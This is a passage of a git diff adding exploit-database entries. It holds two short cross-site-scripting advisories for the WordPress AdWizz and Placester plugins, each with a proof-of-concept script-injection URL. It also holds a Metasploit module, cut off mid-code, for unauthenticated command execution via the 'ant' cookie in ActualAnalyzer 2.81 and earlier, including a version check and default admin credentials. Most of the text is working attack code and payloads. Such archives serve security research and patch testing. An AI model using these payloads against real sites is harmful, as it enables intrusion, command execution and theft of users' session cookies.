+The WPwizz AdWizz plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+AdWizz plugin 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/ad-wizz/template.php?link=%22;%3C/script%3E%3Cscript%3Ealert(0);{//
\ No newline at end of file
diff --git a/platforms/php/webapps/35562.txt b/platforms/php/webapps/35562.txt
new file mode 100755
index 000000000..314abc036
--- /dev/null
+++ b/platforms/php/webapps/35562.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47142/info
+
+The Placester WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Placester 0.1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/placester/admin/support_ajax.php?ajax_action=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/unix/remote/35549.rb b/platforms/unix/remote/35549.rb
new file mode 100755
index 000000000..fe467ef21
--- /dev/null
+++ b/platforms/unix/remote/35549.rb
@@ -0,0 +1,264 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info( + info, + 'Name' => "ActualAnalyzer 'ant' Cookie Command Execution", + 'Description' => %q{ + This module exploits a command execution vulnerability in + ActualAnalyzer version 2.81 and prior. + + The 'aa.php' file allows unauthenticated users to + execute arbitrary commands in the 'ant' cookie. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Benjamin Harris', # Discovery and exploit + 'Brendan Coles ' # Metasploit + ], + 'References' => + [ + ['EDB', '34450'], + ['OSVDB', '110601'] + ], + 'Payload' => + { + 'Space' => 4096, # HTTP cookie + 'DisableNops' => true, + 'BadChars' => "\x00" + }, + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Targets' => + [ + # Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu + ['ActualAnalyzer <= 2.81', { 'auto' => true }] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Aug 28 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']), + OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']), + OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']), + OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', '']) + ], self.class) + end + + # + # Checks if target is running ActualAnalyzer <= 2.81 + # + def check + # check for aa.php + res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php')) + if !res + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown + elsif res.code == 404 + vprint_error("#{peer} - Could not find aa.php") + return Exploit::CheckCode::Safe + elsif 
res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/ + vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.") + return Exploit::CheckCode::Detected + end + # check version + res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php')) + if !res + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown + elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?[\d\.]+)"/ =~ res.body + vprint_status("#{peer} - Found version: #{version}") + if Gem::Version.new(version) <= Gem::Version.new('2.81') + report_vuln( + host: rhost, + name: self.name, + info: "Module #{fullname} detected ActualAnalyzer #{version}", + refs: references, + ) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Detected + elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ + return Exploit::CheckCode::Detected + end + Exploit::CheckCode::Safe + end + + # + # Try to retrieve a valid analytics host from view.php unauthenticated + # + def get_analytics_host_view + analytics_host = nil + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'view.php'), + 'vars_post' => { + 'id_h' => '', + 'listp' => '', + 'act_h' => 'vis_int', + 'oldact' => 'vis_grpg', + 'tint_h' => '', + 'extact_h' => '', + 'home_pos' => '', + 'act' => 'vis_grpg', + 'tint' => 'total', + 'grpg' => '201', + 'cp_vst' => 'on', + 'cp_hst' => 'on', + 'cp_htst' => 'on', + 'cp_reps' => 'y', + 'tab_sort' => '1_1' + } + ) + if !res + vprint_error("#{peer} - Connection failed") + elsif /